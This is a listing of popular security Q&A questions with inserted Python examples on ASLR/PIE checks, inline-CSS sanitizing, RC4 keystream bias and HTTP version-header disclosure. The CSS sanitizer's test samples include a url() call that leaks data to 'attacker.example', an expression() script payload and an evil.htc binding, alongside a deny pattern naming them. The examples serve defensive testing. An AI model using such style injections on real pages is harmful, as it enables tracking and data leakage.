Most Popular (1500 questions)
40 votes, 6 answers
Secure Linux Desktop
I'm looking for hints about secure Linux desktops. Securing servers is no problem: most recent software updates, run only the services required, etc. But what about desktops? I'm thinking about details like NoScript for Firefox, ASLR, PIE and similar…

asked by chris (rep 401, badges 1/5/3)
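The question mentions ASLR and PIE as desktop hardening details. The following is an added example (not from the question or any answer) showing how to check both: whether the kernel's ASLR knob is on, and whether a given executable was built as a position-independent executable, which is what lets ASLR randomize its base address. The check reads the ELF header's `e_type` field (`ET_DYN` for PIE, `ET_EXEC` for a fixed-address binary). The `make_elf_header` helper builds minimal, constructed ELF headers so the example runs without real binaries; the `/proc/sys/kernel/randomize_va_space` path is a standard Linux sysctl.

```python
import os
import struct

ET_EXEC, ET_DYN = 2, 3  # ELF e_type: fixed-address executable vs position-independent image


def elf_type(data: bytes) -> int:
    """Return e_type from an ELF header; the first 20 bytes are enough."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian, 2 = big-endian
    (e_type,) = struct.unpack_from(endian + "H", data, 16)
    return e_type


def is_pie(data: bytes) -> bool:
    """True when the image is ET_DYN and so can be loaded at a randomized base.

    Caveat: shared libraries are ET_DYN too, so only apply this to executables.
    """
    return elf_type(data) == ET_DYN


def system_aslr_level():
    """randomize_va_space: 0 = off, 1 = stack/mmap/vdso, 2 = also brk. None if not Linux."""
    path = "/proc/sys/kernel/randomize_va_space"
    if not os.path.exists(path):
        return None
    with open(path) as f:
        return int(f.read().strip())


def make_elf_header(e_type: int, little_endian: bool = True, bits: int = 64) -> bytes:
    """Constructed minimal ELF header for this example (not a loadable binary)."""
    e_ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1 if little_endian else 2, 1]) + bytes(9)
    endian = "<" if little_endian else ">"
    e_machine = 0x3E if little_endian else 0x14  # x86-64 vs PowerPC; arbitrary here
    return e_ident + struct.pack(endian + "HHI", e_type, e_machine, 1)


def check_executable(path: str) -> bool:
    """Report whether the executable at `path` is a PIE."""
    with open(path, "rb") as f:
        return is_pie(f.read(20))


if __name__ == "__main__":
    print("ASLR level:", system_aslr_level())
    for name, hdr in [("ET_EXEC", make_elf_header(ET_EXEC)), ("ET_DYN", make_elf_header(ET_DYN))]:
        print(name, "PIE" if is_pie(hdr) else "not PIE")
    # On a real system: check_executable("/bin/ls")
```

A non-PIE binary on a desktop with ASLR set to 2 still loads its main text and data segments at a fixed address, so the two checks only add up to useful randomization together.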
40 votes, 1 answer
CSS based attacks
I'm currently working on a plugin for a CMS which should allow content editors to write inline style tags.
I'm looking for advice / links on how inline styles could be abused.
Part of the reason for the plugin is to allow for a strict content…

asked by symcbean (rep 18,625, badges 1/41/75)
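As an added example (not part of the question or its answer), here is a small allow-list sanitizer for inline `style` attributes that illustrates the main ways inline styles get abused: `url()` values that make the browser fetch an attacker-controlled resource (tracking, Referer leakage, arbitrary GET requests), `expression()` and `-moz-binding` that executed script in legacy engines, CSS backslash escapes and comments that smuggle those keywords past naive string matching, and layout properties (`position`, `z-index`, `opacity`) that let an editor overlay trusted UI. The property list and the test strings are constructed for this example; a production sanitizer should use a real CSS parser such as tinycss2 rather than splitting on semicolons.

```python
import re

# Allow-list of declarations an editor may set inline (constructed for this example).
# Deliberately absent: position, z-index, opacity, background-image, behavior, content.
ALLOWED_PROPERTIES = {
    "color", "background-color", "font-weight", "font-style", "font-size",
    "text-align", "text-decoration", "margin", "padding", "border",
}

# Anything that can trigger a fetch, run script in legacy engines, or hide a
# second declaration from a naive parser.
DANGEROUS_VALUE = re.compile(
    r"url\s*\(|expression\s*\(|-moz-binding|@import|javascript:|\\|/\*|<|&#|\{|\}",
    re.IGNORECASE,
)

# Characters a benign value may contain: keywords, hex colours, lengths, rgb(...).
SAFE_VALUE = re.compile(r"^[A-Za-z0-9 #%.,()/-]+$")


def parse_declarations(style: str):
    """Split 'prop: value; prop: value' into (prop, value) pairs.

    Splitting on ';' is acceptable here only because quoted strings and url()
    are rejected outright; a real parser is needed if they are ever allowed.
    """
    pairs = []
    for chunk in style.split(";"):
        if ":" not in chunk:
            continue
        prop, value = chunk.split(":", 1)
        pairs.append((prop.strip().lower(), value.strip()))
    return pairs


def rejected_declarations(style: str):
    """Declarations that would be dropped, with a reason (useful for audit logs)."""
    out = []
    for prop, value in parse_declarations(style):
        if prop not in ALLOWED_PROPERTIES:
            out.append((prop, value, "property not allowed"))
        elif DANGEROUS_VALUE.search(value) or not SAFE_VALUE.match(value):
            out.append((prop, value, "dangerous or malformed value"))
    return out


def sanitize_inline_style(style: str) -> str:
    """Keep only allow-listed properties whose values pass both checks."""
    kept = []
    for prop, value in parse_declarations(style):
        if prop in ALLOWED_PROPERTIES and not DANGEROUS_VALUE.search(value) and SAFE_VALUE.match(value):
            kept.append(f"{prop}: {value}")
    return "; ".join(kept)


if __name__ == "__main__":
    samples = [  # constructed inputs
        "color: red; background: url(https://attacker.example/leak?x=1)",
        "color: re\\64 ; font-weight: bold",
        "font-weight: bold; behavior: url(evil.htc)",
        "color: expression(alert(1))",
    ]
    for s in samples:
        print(repr(s), "->", repr(sanitize_inline_style(s)), rejected_declarations(s))
```

Rejecting the backslash outright is what defeats escape tricks like `\75 rl(`: the browser would decode it back into `url(`, but a keyword filter that does not unescape first would not. Even with `url()` gone, layout properties remain a content-integrity problem, which is why they are left off the allow-list.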
40 votes, 5 answers
Client-side encryption, but cloud service can still decrypt data in the event of a death? Is this possible?
I've been worried about this password manager, PasswordBox, that seems to be gathering quite a bit of steam lately.
They seem to have raised VC funding and are offering a free password management and storage tool. Their team does not seem to have…

asked by Mallory (rep 401, badges 4/5)
40 votes, 1 answer
Passive and active attacks via X11. Is Wayland any better?
In The Linux Security Circus: On GUI isolation - The Invisible Things Lab's blog, Joanna Rutkowska describes attacks from one X11 app on another and the general problem of the lack of GUI-level isolation, and how it essentially nullifies all the…

asked by nealmcb (rep 20,783, badges 6/72/117)
40 votes, 1 answer
TLS: RC4 or not RC4?
I was reading another interesting article by Matthew Green today, saying that
if you're using RC4 as your primary ciphersuite in SSL/TLS, now would be a great time to stop
As far as I'm aware RC4 has been up'd on the list of ciphersuites to…

asked by Yoav Aner (rep 5,359, badges 3/26/37)
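The reason RC4 is a bad TLS cipher is that its keystream is biased, and the biases are large enough to recover plaintext bytes that are repeated across many connections (cookies, for instance). As an added example, not from the question or Green's article, the code below implements RC4 and measures the best-known single-byte bias, due to Mantin and Shamir: the second keystream byte is 0 with probability close to 1/128 rather than 1/256. The 16-byte keys are drawn from a seeded PRNG solely to make the experiment reproducible, and the trial count is an assumption; the `"Key"` test vector used to check the implementation is the standard published one.

```python
import random


def rc4_keystream(key: bytes, count: int) -> bytes:
    """Return the first `count` bytes of the RC4 keystream for `key` (KSA then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(count):  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def second_byte_zero_count(trials: int, seed: int = 1234) -> int:
    """Count how often the 2nd keystream byte is 0 over `trials` random 16-byte keys."""
    rng = random.Random(seed)  # reproducibility only; never use this for real keys
    zeros = 0
    for _ in range(trials):
        key = bytes(rng.getrandbits(8) for _ in range(16))
        if rc4_keystream(key, 2)[1] == 0:
            zeros += 1
    return zeros


if __name__ == "__main__":
    assert rc4_keystream(b"Key", 10).hex() == "eb9f7781b734ca72a719"  # published test vector
    trials = 20000
    zeros = second_byte_zero_count(trials)
    print(f"2nd byte == 0 in {zeros} of {trials} keys")
    print(f"unbiased expectation ~{trials / 256:.0f}, Mantin-Shamir expectation ~{trials / 128:.0f}")
```

In TLS the first bytes of the keystream encrypt the first bytes of the record, so a fixed plaintext at position 2 (here, the byte XORed with a keystream byte that is 0 twice as often as it should be) leaks directly from the ciphertext distribution across sessions. The 2013 attacks this question is about exploit many such biases across the first 256 bytes, which is why the answer to "RC4 or not RC4?" became "not RC4" and RC4 was eventually prohibited for TLS.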
40 votes, 5 answers
What's the difference between VPN over TCP vs UDP?
My VPN provider gives me the option between using UDP and TCP for connections. According to this site UDP is faster over short distances. I'm on the same continent as my server, is that considered short distance? Is there a test I can run to compare…

asked by David Drohang (rep 463, badges 1/4/5)
40 votes, 6 answers
Software vendor refuses to fix security vulnerability - what to do?
I work as a consultant for a large corporation that uses some software, in which I have found a security vulnerability. I notified both my client and the software vendor about a year ago. They referred the case to their account manager (!), who (in…

asked by TravelingFox (rep 433, badges 3/7)
40 votes, 4 answers
How do open-source projects prevent disclosing a bug while fixing it?
I understand that many open-source projects request vulnerabilities not to be disclosed on their public bug tracker but rather by privately contacting the project's security team, to prevent disclosing the bug before a fix is available. That makes…

asked by Heinzi (rep 3,088, badges 2/23/27)
40 votes, 8 answers
What is the attack scenario against which encrypted files provide protection?
There are a couple of files / tools which provide file-level encryption. I guess PDF and ZIP are probably the most commonly known ones.
I wonder what scenario they actually help with or if it just is a bad solution.
For example, if I want to be sure…

asked by Martin Thoma (rep 3,952, badges 6/33/42)
40 votes, 8 answers
Are all USB-based attacks dependent on being able to inject keystrokes?
From what I've seen, USB-based attacks such as RubberDucky need to be able to open a terminal and then execute commands from there, usually to download and then install malware or to open a reverse shell.
Is this how most, if not all USB-based…

asked by user942937 (rep 983, badges 8/14)
40 votes, 6 answers
Schemes/ Mechanisms that could provide one time decryption?
I am quite familiar with most of the common undergrad/grad security foundations; but I couldn't find anything related to this scenario:
A scheme/system where a piece of data can only be 'decrypted' AND read only once (potentially in a computer…

asked by DaveIdito (rep 521, badges 4/3)
40 votes, 5 answers
Why do some web servers still provide information on vendor and version in the HTTP response headers?
I think in the security field it is a well-known fact that it's not a good idea to let the web server vendor (e.g. Apache) and the version be visible to the outside, as this can be used to launch targeted attacks against a specific server…

asked by dfsg76 (rep 549, badges 4/7)
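As an added example (not part of the question or its answers), the code below does the two things a practitioner wants here: it parses a raw HTTP/1.x response and reports which headers disclose a product version, and it shows what an edge middleware does to strip them before the response leaves. The sample response is constructed for the example, not captured from any real host; the list of fingerprinting headers is the usual set and can be extended.

```python
import re

# Headers that commonly carry the product and version of the serving stack.
FINGERPRINT_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version", "x-generator"}
VERSION = re.compile(r"\b\d+(\.\d+)+\b")  # e.g. 2.4.41, 7.4.3


def parse_response_headers(raw: str):
    """Parse the header block of a raw HTTP/1.x response into (status_line, [(name, value)])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def version_disclosures(raw: str):
    """Fingerprinting headers whose value includes a dotted version number."""
    _, headers = parse_response_headers(raw)
    return [(n, v) for n, v in headers if n.lower() in FINGERPRINT_HEADERS and VERSION.search(v)]


def strip_fingerprint_headers(headers):
    """What a hardening proxy or middleware does before the response leaves the edge."""
    return [(n, v) for n, v in headers if n.lower() not in FINGERPRINT_HEADERS]


SAMPLE = (  # constructed response for this example
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

if __name__ == "__main__":
    for name, value in version_disclosures(SAMPLE):
        print(f"version disclosed: {name}: {value}")
    _, hdrs = parse_response_headers(SAMPLE)
    print("after stripping:", strip_fingerprint_headers(hdrs))
```

The server-side equivalents are `ServerTokens Prod` plus `ServerSignature Off` for Apache (which still sends `Server: Apache`, just without the version), `server_tokens off;` for nginx, and `expose_php = Off` for PHP. Hiding the version is defence in depth only: the question's premise is right that it removes the cheap lookup, but the fix for a vulnerable version is patching, since behaviour-based fingerprinting still works.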
40 votes, 4 answers
What benefits are there to blocking most search engines?
While on a client's site using the corporate network, I see that only a few search engines are allowed. Google and Bing, possibly others; while my fav DuckDuckGo is blocked, and a few others that I've tried are also blocked. The search engines are…

asked by YetAnotherRandomUser (rep 2,290, badges 2/15/20)
40 votes, 2 answers
How do email clients "send later" without storing a password?
Email clients like Spark for macOS have a feature where a user can send an email later, at any given time, even when the computer is turned off. An SMTP server needs password-based authentication, though.
Does that mean that if I use Spark to send…

asked by NikxDa (rep 783, badges 1/5/12)
40 votes, 6 answers
Should 2FA be enabled on service accounts?
See the title. I'm involved in a security audit right now, and am wondering whether 2FA should be enabled on not just human login accounts but also on service accounts (non-human accounts)? If so, how is this normally managed? Someone must still be…

asked by Jason (rep 509, badges 1/4/3)